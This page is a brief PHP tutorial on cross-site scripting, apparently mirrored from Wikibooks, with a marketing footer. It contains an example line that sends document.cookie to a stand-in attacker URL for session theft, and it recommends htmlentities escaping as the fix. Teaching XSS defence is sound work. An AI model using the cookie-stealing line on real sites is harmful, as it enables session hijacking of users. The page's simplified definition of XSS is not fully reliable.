Cross Site Scripting
Contributors PHP Programming
Cross Site Scripting Attacks
dbal

Problem

Cross site scripting (or XSS) is a basic description of a script sending sensitive information (such as cookies or other session identifiers) to other websites.

Usually, these attacks affect websites that content can be edited or added to. In most cases, session identifiers or even usernames/passwords are stored inside cookies. In the case somebody knows the session identifier, they can easily use it on their machine to do any malicious tasks that you would not be happy about.

Right now, if you are logged in on Study Guides or any other websites, go to that page and type this into the address bar:

javascript:void(alert(document.cookie))

These are cookies that are sent to the website each time to identify you. Easily, if your site is not XSS proof - the cracker will write anything like this:

javascript:void(document.location('http://killer.website.com/steal_cookie.php?cookie_data='+document.cookie))

that will send the cookie information to their website.

Prevention

There are no chances to protect yourself from XSS attacks without removing malicious HTML/JavaScript code that would be submitted to another website.

As far, the most common way is to use htmlentities or htmlspecialchars to filter the coding so nobody would add any HTML to your site (e.g. blog comments):

$message = htmlentities($message);

Another way to do this is to overall create any kind of "protected mode" code, such as MediaWiki, BBCode or others that have been invented for purpose of easily styling/formatting user's content.

External Links


Contributors PHP Programming
Cross Site Scripting Attacks
dbal

  This article uses material from the Wikipedia page available here. It is released under the Creative Commons Attribution-Share-Alike License 3.0.

PHP_Programming/Cross_Site_Scripting
 



 

Connect with defaultLogic
What We've Done
Led Digital Marketing Efforts of Top 500 e-Retailers.
Worked with Top Brands at Leading Agencies.
Successfully Managed Over $50 million in Digital Ad Spend.
Developed Strategies and Processes that Enabled Brands to Grow During an Economic Downturn.
Taught Advanced Internet Marketing Strategies at the graduate level.


Manage research, learning and skills at defaultlogic.com. Create an account using LinkedIn to manage and organize your omni-channel knowledge. defaultlogic.com is like a shopping cart for information -- helping you to save, discuss and share.


  Contact Us